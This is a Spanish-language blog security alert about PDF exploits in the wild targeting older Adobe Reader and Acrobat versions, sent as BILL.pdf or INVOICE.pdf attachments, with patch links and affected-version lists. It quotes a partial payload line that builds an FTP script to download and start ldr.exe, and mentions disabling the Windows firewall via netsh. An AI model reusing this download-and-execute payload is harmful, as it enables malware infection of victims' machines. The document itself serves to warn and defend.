Alerta: Vulnerabilidades en productos Adobe (Exploits PDF in the wild)

Buenas,

Pese a que es un tema nada reciente y solucionado por el fabricante hace un par de días, parece que empieza a haber una cantidad ingente de exploits in the wild circulando, y la gente que no se ha enterado no ha actualizado. Así pues, me váis a permitir que emita la alerta.

Especialmente peligroso es que estos falsos documentos PDF se están enviando como adjuntos al correo pueden provocar familiaridad entre los receptores. El formato PDF siempre ha gozado de una falsa apariencia de seguridad entre los usuarios, ya que pese a ser un formato seguro, no siempre son seguros los clientes que permiten visualizar documentos portables. Los usuarios suelen confiar en PDF, asumiendo que nada malo les puede pasar.

Estos exploits están llegando a los buzones como adjuntos «BILL.pdf» y «INVOICE.pdf», aunque es factible que estos nombres se vayan permutando. El formato del exploit viene a ser parecido al siguiente:

obj< 1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

En este ejemplo podemos comprobar que la carga maliciosa provoca la desactivación del firewall de Windows (netsh firewall set opmode mode=disable), la recogida de un FTP malicioso del fichero ldr.exe (get /ldr.exe) y su ejecución (start ldr.exe). Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso. Una vez instalado el fichero, no queda ahí la cosa: ldr.exe, o cualquiera que sea el ejecutable malicioso instalado aprovechando la vulnerabilidad descrita, será con toda probabilidad un huevo kinder con su correspondiente regalito: un troyano para robar credenciales, un control remoto para integrar la máquina en un botnet … cualquier combinación es posible.

Para evitar problemas, actualizad siguiendo las recomendaciones de Adobe y no perdáis de vista lo que recomienda SANS. Os proporciono dos enlaces:

Parche para Acrobat
Parche para Acrobat Reader

Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.

Los usuarios de Windows pueden recurrir a lectores PDF alternativos, y que por tanto, por menor grado de exposición, suelen protagonizar menos incidentes de seguridad. Una opción muy recomendable es Foxit Reader. Si lo que quieréis es una aplicación libre para generar PDF, podéis emplear las herramientas Ghostscript.

NOTA IMPORTANTE: Sólo los usuarios de Windows XP con Internet Explorer 7 están afectados por la vulnerabilidad descrita.

Un saludo,